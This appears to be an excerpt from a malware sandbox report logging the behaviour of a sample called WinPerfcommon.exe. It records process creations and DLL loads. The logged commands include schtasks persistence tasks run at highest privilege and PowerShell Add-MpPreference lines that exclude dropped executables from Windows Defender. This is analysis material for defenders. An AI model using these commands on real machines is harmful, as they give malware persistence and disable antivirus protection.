                              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbN" /sc ONLOGON /tr "'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
                              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 10 /tr "'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
                              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinPerfcommonW" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\WinPerfcommon.exe'" /f
                              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinPerfcommon" /sc ONLOGON /tr "'C:\Users\user\Desktop\WinPerfcommon.exe'" /rl HIGHEST /f
                              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinPerfcommonW" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\WinPerfcommon.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe'
                              Source: unknownProcess created: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SgrmBroker.exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WinPerfcommon.exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Recovery\SgrmBroker.exe C:\Recovery\SgrmBroker.exe
                              Source: unknownProcess created: C:\Recovery\SgrmBroker.exe C:\Recovery\SgrmBroker.exe
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BUc8lPV5KF.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Program Files\Adobe\StartMenuExperienceHost.exe "C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                              Source: unknownProcess created: C:\Program Files\Adobe\StartMenuExperienceHost.exe "C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                              Source: unknownProcess created: C:\Recovery\SystemSettings.exe C:\Recovery\SystemSettings.exe
                              Source: unknownProcess created: C:\Recovery\SystemSettings.exe C:\Recovery\SystemSettings.exe
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: unknownProcess created: C:\Users\user\Desktop\WinPerfcommon.exe C:\Users\user\Desktop\WinPerfcommon.exe
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: unknownProcess created: C:\Users\user\Desktop\WinPerfcommon.exe C:\Users\user\Desktop\WinPerfcommon.exe
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"
                              Source: unknownProcess created: C:\Program Files\Adobe\StartMenuExperienceHost.exe "C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bCL7Nxg3GW.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbN" /sc ONLOGON /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /fJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 9 /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /fJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SgrmBroker.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 13 /tr "'C:\Recovery\SgrmBroker.exe'" /rl HIGHEST /fJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BUc8lPV5KF.bat" Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA39D.tmp" "c:\Windows\System32\CSCCE33B305EBF546CF9142A728297AE6DA.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bCL7Nxg3GW.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: version.dllJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
